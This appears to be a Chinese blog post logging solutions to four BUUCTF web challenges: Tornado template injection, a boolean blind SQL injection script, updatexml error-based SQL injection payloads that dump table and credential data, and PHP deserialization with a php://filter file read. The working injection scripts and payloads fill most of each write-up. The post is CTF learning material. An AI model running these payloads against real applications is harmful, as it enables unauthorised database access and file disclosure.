[BUUCTF]刷题记录3

最新推荐文章于 2024-03-27 23:26:20 发布
最新推荐文章于 2024-03-27 23:26:20 发布
阅读量248 收藏 1
点赞数
分类专栏: 刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/115314150
版权

[护网杯 2018]easy_tornado

tornado是python的web框架,虽然还没开始学pythonWeb的开发,就用这个来了解一下

看welcome.txt有个render
render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面

再看hints.txt
有个md5(cookie_secret+md5(filename))
filename已经知道了
在这里插入图片描述
接下就是要拿到cookie_secret

dirmap扫描一下,有发现
在这里插入图片描述
有内容,由于是框架搭建的,猜测是模板注入,error?msg=0
在这里插入图片描述
尝试一个{{6*6}}
在这里插入图片描述
查阅文档发现cookie_secret在Application对象settings属性中,self.application.settings也叫RequestHandler.settings

handler指向的处理当前这个页面的RequestHandler对象,
RequestHandler.settings指向self.application.settings,
因此handler.settings指向RequestHandler.application.settings

payload:/error?msg={{handler.settings}}
得到cookie_secret
在这里插入图片描述

拿去md5加密就可以了

import hashlib

def md5(s):
    md5 = hashlib.md5() 
    md5.update(s.encode('utf-8'))
    return md5.hexdigest()

filename="/fllllllllllllag"
cookie="34c63def-7f26-4e7d-b023-12243ed6e945"

print(md5(cookie+md5(filename)))

payload:/file?filename=/fllllllllllllag&filehash=58ead04a94256ddd9c68348220f543e2

[CISCN2019 华北赛区 Day2 Web1]Hack World

在这里插入图片描述
sql注入的题,先fuzz跑一下
绝大多数的都被过滤了,那么就不能直接爆库名啥的了
在这里插入图片描述
布尔盲注

知道输入1会返回信息,输入0就会返回报错信息

二分法进行flag字符的匹配
利用ascii(substr((select(flag)from(flag)),1,1))<120,截取flag的第一位,再转换成ascii对应的十进制数字,如果满足<号的条件就返回1,否则返回0,不断用二分法来获取匹配的字符,知道匹配确定,就把flag字符给拼接1起来

记得加点延时,我跑了很多次才跑对。。
脚本:

import requests
import time

url = 'http://304b4c3c-1a70-4706-ac03-e65b91c0da36.node3.buuoj.cn/index.php'
flag = ''

# 设flag的最大长度在50内,for遍历到 i 来拼接 
for i in range(0, 50):
    max = 127
    min = 0
    # 遍历所有的Ascii
    for c in range(0, 127):
        # 二分法查找
        s = int((max + min) / 2)
        payload = '(ascii(substr((select(flag)from(flag)),%d,1))<%d)' % (i, s)
        r = requests.post(url, data={'id': payload})
        # 加点延时,buu不能太快请求
        time.sleep(0.5)
        if 'Hello' in str(r.content):
            max = s
        else:
            min = s
        if (max - min) <= 1:
            # 匹配成功,使用chr()来转回ascii字符
            flag += chr(max-1)
            print(flag)
            break
print(flag)

# 题目是输入1有正确回显,输入0就会给错误回显

[极客大挑战 2019]HardSQL

先跑了一下sqlmap,貌似不行
在这里插入图片描述
看wp学到是报错注入
使用updatexml报错法注入

查数据库信息

?username=admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=21

得到:geek
查表

?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=21

得到:H4rDsq1
查字段

?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23&password=21

得到:id,username,password
查数据

?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))%23&password=21

在这里插入图片描述
报错注入最多返回32位信息
用substring被过滤了
用right来读取后边的内容

?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(right(password,20)))from(H4rDsq1)),0x7e),1))%23&password=1

在这里插入图片描述

[网鼎杯 2020 青龙组]AreUSerialz

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

首先,ord($s[$i]) >= 32 && ord($s[$i]) <= 125就意味着不可见字符是不能出现的
protected的反序列化是会有个\x00*\x00属性名的,但是在php7.1后序列化就不会区分类型了,所以可以直接改成public

class FileHandler {

    public $op = "2";
    public $filename;
    public $content;

$data = new FileHandler;
echo serialize($data);

看到read里面可以读取文件,所以就让进程跳到这里,php协议操作一波读取flag.php

private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

看到process,如果双等号等于2就会跳到read

public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

但是这里就有问题了,如果三等号等于2的话就会重新赋值为1
但是==可以不比较类型,所以就不要给op赋值"2"字符类型,赋值整数类型2就可以了

function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

所以这样构造序列化

<?php

class FileHandler {

    public $op = 2;
    public $filename = "php://filter/read=convert.base64-encord/resource=flag.php";
    public $content;

}
$data = new FileHandler;
echo serialize($data);

拿到base64,拿去解码就可以了

huamanggg
关注
专栏目录
buuctf 刷题记录(三)
pwnyuan's blog
11-18 3328
Brefore 害,还是buu的水题,我太菜了,只能写一分题 ┭┮﹏┭┮ Crypto [GUET-CTF2019]BaByRsa 思路:给了p+q,给了(p+1)*(q+1) ,简单的数学解方程,然后就直接基本rsa (p+1) * (q+1) - 1 - (p+q) ==> p * q (p+q)^2 - 4 * p * q ==> (p-q)^2 ==> (p-q) ( (p+q) +(p-q) ) //2 ==> p ==>q exp import gmp
buuctf刷题记录
mackilo的博客
02-16 2966
2022-1-16 reverse2 扔到IDA64里解析, F5生成伪代码 通过分析得出经过一定的变换后与flag进行比较的 查看flag的值,是{hacking_for_fun} 再返回前面看如何对flag进行变换的,将105、114、49转换成值, 箭头所指的函数功能为,把flag中存在的’i’以及’r’转换成’1’,进而得出正确flag。 2022-1-17 内涵的软件 下载好以后发现是乱码的exe文件,拖到ExeinfoPE里查看信息, 没有加壳,用IDA打开,查看main函数 可以看到跳
每天一道ctf
whisper921的博客
11-07 750
PHP的字符串解析特性:PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:1.删除空白符 2.将某些字符转换为下划线(包括空格)【当waf不让你过的时候,php却可以让你过】。但php在解析的时候,会先把空格给去掉,这样我们的代码还能正常运行,还上传了非法字符。PHP的字符串解析特性:PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:1.删除空白符 2.将某些字符转换为下划线(包括空格)【当waf不让你过的时候,php却可以让你过】。
BUUCTF-Web】easy_tornado
RexHa的博客
09-04 560
BUUCTF-Web】easy_tornado
攻防世界 web高手进阶区 3分题
闵行小鱼塘
06-11 607
继续ctf的旅程,攻防世界web高手进阶区的3分题
攻防世界web高阶3分题(easytornado)
qq_45791542的博客
08-01 327
读题 PS: tornado 查资料发现 Tornado (python的web框架) 打开题目发现三个文件 第一个文件 说明flag应该是在fllllllllllllag文件中 再进入第二个文件 进入第三个文件 发现提示md5(cookie_secret + md5(filename)),即先将filenamemd5加密,再将cookie_secret与md5加密后的filename进行md5加密,也就是说,目前我们需要知道的是filename和cookie_secret 测试
buuctf刷题记录(3)
weixin_53409153的博客
07-19 674
[ACTF新生赛2020]rome 首先,还是查壳: 无壳,为32位: 跟进,跳转到交叉应用列表: 然后,在F5查看伪代码: int func() { int result; // eax int v1; // [esp+14h] [ebp-44h] int v2; // [esp+18h] [ebp-40h] int v3; // [esp+1Ch] [ebp-3Ch] int v4; // [esp+20h] [ebp-38h] unsigned __int8 v5; /
buuctf刷题记录(6)
weixin_53409153的博客
08-03 312
[MRCTF2020]Xor 查壳: 拖入IDA中: 跟进,但是我们无法对关键函数sub_401090查看伪代码: 然后我们就直接看: 再函数中可以看到v0和byte_4212c0按位异或,最后得到byte_41EA08就会输出right,然后再查看: 最后再写脚本: a="MSAWB~FXZ:J:`tQJ\"N@ bpdd}8g" s="" for i in range(len(a)): s+=chr(i^ord(a[i])) print (s) 运行得到: MRCTF{@_R3@
2021-08-30 BUUCTF刷题记录PWN
m0_56897090的博客
08-30 529
2021-08-30 BUUCTF刷题记录 刷题数量:13 题目分类:栈溢出、堆、pwn基础 文章目录2021-08-30 BUUCTF刷题记录[Black Watch 入群题]PWN0x00 题目描述0x01 分析思路0x02 EXPez_pz_hackover_20160x00 题目描述0x01 题目分析0x02 思路0x03 EXPjarvisoj_tell_me_something0x00 题目描述0x01 题目分析0x02 EXPJarvisoj_level30x00 题目描述0x01 题目思路0
CTF-WEB学习-模板注入-[护网杯 2018]easy_tornado
qq_43564182的博客
07-04 499
CTF-WEB学习-模板注入-[护网杯 2018]easy_tornado 文章目录CTF-WEB学习-模板注入-[护网杯 2018]easy_tornado解题网页中出现cookie: ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210704232702503.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0
2018护网杯逆向题目
10-16
2018护网杯的3道逆向题目.
攻防世界-easytornado
m0_49025459的博客
12-22 1227
简单来说,就是网站内容的动态部分,如果有一个网站的内容几乎相同,但只有某些部分发生改变,那么他们很有可能使用了模板模板看起来如下:hello{user.name} 他们有一个静态罐和一个动态罐,hello为静态罐,{}里的内容为动态罐这就是为什么编译器如何是知道该部分是动态的,另外需要注意的是,并非是所有模板看起来都是像上面那样,列如:hello{{user.name}}这是一个名为jinja。
服务端模板注入攻击原理以及实战(SSTI)
Ba1_Ma0的博客
04-10 3731
什么是模板 简单来说,就是网站内容的动态部分,如果有一个网站的内容几乎相同,但只有某些部分发生改变,那么他们很有可能使用了模板 模板看起来如下: hello{user.name} 他们有一个静态罐和一个动态罐,hello为静态罐,{}里的内容为动态罐 这就是为什么编译器如何是知道该部分是动态的,另外需要注意的是,并非是所有模板看起来都是像上面那样,列如: hello{{user.name}} 这是一个名为jinja模板引擎的示例,用流行的python框架(如django和flask)所使用 什么是模板注
BUUCTF easy_tornado render模板注入
hhh
10-09 1009
模板注入详解请看这里:https://www.cnblogs.com/cimuhuashuimu/p/11544455.html 题目一开始给了三个文件的链接,分别查看: flag.txt里告诉我们文件在/fllllllllllllag里,welcome.txt我们给我们一个关键词render,经过搜索之后知道有render函数的模板注入;最重要的是hint.tx...
CTF_Web:攻防世界高手区进阶题WP(15-18)
AFCC_的博客(Web_Dog)
09-01 1078
0x15 easytornado 0x16 shrine 0x17 isc-05 题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统。 这个题目提示了出现问题的地方在于设备维护中心页面,所以我们直接进去。 url为:http://111.200.241.244:63219/index.php?page=index 发现页面直接显示了index。 基本page是输入什么回显什么,这里使用php伪协议读取文件源码试试php://filter/read=convert.base64-encode/
buuctf刷题 3(1个sstl模板注入 1个session伪造 以及php)
weixin_63231007的博客
05-03 785
[护网杯 2018]easy_tornado 1 访问页面所给的可以得到 /flag.txt flag in /fllllllllllllag 可知flag在/fllllllllllllag。 /welcome.txt render /hints.txt md5(cookie_secret+md5(filename)) render不知道是上面意思。看别人题解说:结合题目给的tornado,可以想到SSTI。 render()函数是渲染函数,进行服务器端渲染。所以能想到模板注入 [护网..
[护网杯 2018]easy_tornado 1(两种解法!)
m0_73734159的博客
11-12 2492
在tornado模板中,存在一些可以访问的快速对象,这里用到的是handler.settings,handler 指向RequestHandler,而RequestHandler.settings又指向self.application.settings,所以handler.settings就指向RequestHandler.application.settings了,这里面就是我们的一些环境变量。猜测解题关键点在md5(cookie_secret+md5(filename))这里。改哈希值看看是否有变化。
[BT]BUUCTF刷题第9天(3.27)
最新发布
Bluetuan的博客
03-27 569
打开网站就是三个txt文件当点进flag.txt时,url变为flag位于的文件是知道了,但是用于md5加密的还不知道,因此接下来的重点是找到这个值这里发现如果将url随便修改一下页面会返回报错网页,而且页面显示内容就是url的msg参数值,根据题目描述,网站由Python tornado模板渲染搭建,且/welcome.txt的内容是render ,因此可能存在模板注入render()是tornado里的函数,可以生成html模板。是一个渲染函数尝试输入1但是尝试{{7*7}}
攻防世界--Web进阶--easytornado---模板注入
z2560088的博客
10-11 263
目录 信息搜集 模板注入 生成filehash 信息搜集 发现flag的位置,于是我们试试能不能访问 报错了 查看/welcome.txt 由于render({options})可以猜测有模板注入漏洞。 /hints.txt提醒md5(cookie_secret+md5(filename)) 这个应该是file的hash算法了 filename应该是/fllllllllllllag cookie_secret不清楚 模板注入...
buuctf reverse reverse3
09-27
BUUCTF Reverse Reverse3是一个题目,通过对给定的字符串进行逆运算,解密出一个flag。首先,给出的字符串经过了base64加密和按位加的操作,得到了"e3nifIH9b_C@n@dH"这个结果。要得到flag,我们需要进行逆运算。通过按位减和base64解密,可以得到flag {i_l0ve_you}。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值